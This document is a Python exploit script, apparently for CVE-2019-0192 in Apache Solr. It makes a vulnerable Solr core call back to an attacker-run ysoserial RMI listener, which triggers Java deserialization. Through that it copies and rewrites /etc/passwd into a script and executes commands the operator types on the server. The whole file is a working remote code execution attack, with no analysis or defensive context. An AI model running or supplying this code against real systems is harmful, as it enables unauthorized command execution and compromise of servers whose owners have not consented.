import base64 import requests import subprocess import signal import sys import os import time import re remote = "http://172.18.0.5:8983" ressource = "" RHOST = "172.18.0.1" RPORT = "1099" proxy = { } def exploit(command): print("\n Run the malicious RMI server using yoserial by running this command:") print("\n java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21" + command) if __name__ == "__main__": print("\nCVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5\n") print("[+] Checking if ressource available =>", end=' ') burp0_url = remote + "/solr/admin/cores?wt=json" r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 200: if r.json()['status'] == "": print("KO") sys.exit() else: a = list(r.json()['status'].keys()) ressource = "/solr/" + a[0] + "/config" print(ressource) else: print("KO") sys.exit() while True: try: command = input("command (\033[92mnot reflected\033[0m)> ") if command == "exit": print("Exiting...") break command = base64.b64encode(command.encode('utf-8')) command_str = command.decode('utf-8') command_str = command_str.replace('/', '+') pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'cp /etc/passwd /tmp/passwd'", stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid) print("[+] Copy file to tmp directory =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/json"} burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}} r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json) if r.status_code == 500: m = re.search('(undeclared checked exception; nested exception is)', r.text) if m: print("\033[92mOK\033[0m") else: print("\n[-] Error") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() else: print("KO") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() os.killpg(os.getpgid(pro.pid), signal.SIGTERM) time.sleep(3) pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1cpwn /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid) print("[+] Preparing file =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/json"} burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}} r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json) if r.status_code == 500: print("\033[92mOK\033[0m") else: print("KO") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() os.killpg(os.getpgid(pro.pid), signal.SIGTERM) time.sleep(3) pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i /[^pwn]/d /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid) print("[+] Cleaning temp file =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/json"} burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}} r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json) if r.status_code == 500: print("\033[92mOK\033[0m") else: print("KO") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() os.killpg(os.getpgid(pro.pid), signal.SIGTERM) time.sleep(3) pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1s/pwn/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid) print("[+] Writing command into temp file =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/json"} burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}} r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json) if r.status_code == 500: print("\033[92mOK\033[0m") else: print("KO") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() os.killpg(os.getpgid(pro.pid), signal.SIGTERM) time.sleep(3) pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid) print("[+] Decode base64 command =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/json"} burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}} r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json) if r.status_code == 500: print("\033[92mOK\033[0m") else: print("KO") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() os.killpg(os.getpgid(pro.pid), signal.SIGTERM) time.sleep(3) pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash pwn.txt'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid) print("[+] Executing command =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/json"} burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}} r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json) if r.status_code == 500: print("\033[92mOK\033[0m") else: print("KO") os.killpg(os.getpgid(pro.pid), signal.SIGTERM) sys.exit() os.killpg(os.getpgid(pro.pid), signal.SIGTERM) time.sleep(3) except KeyboardInterrupt: print("Exiting...") break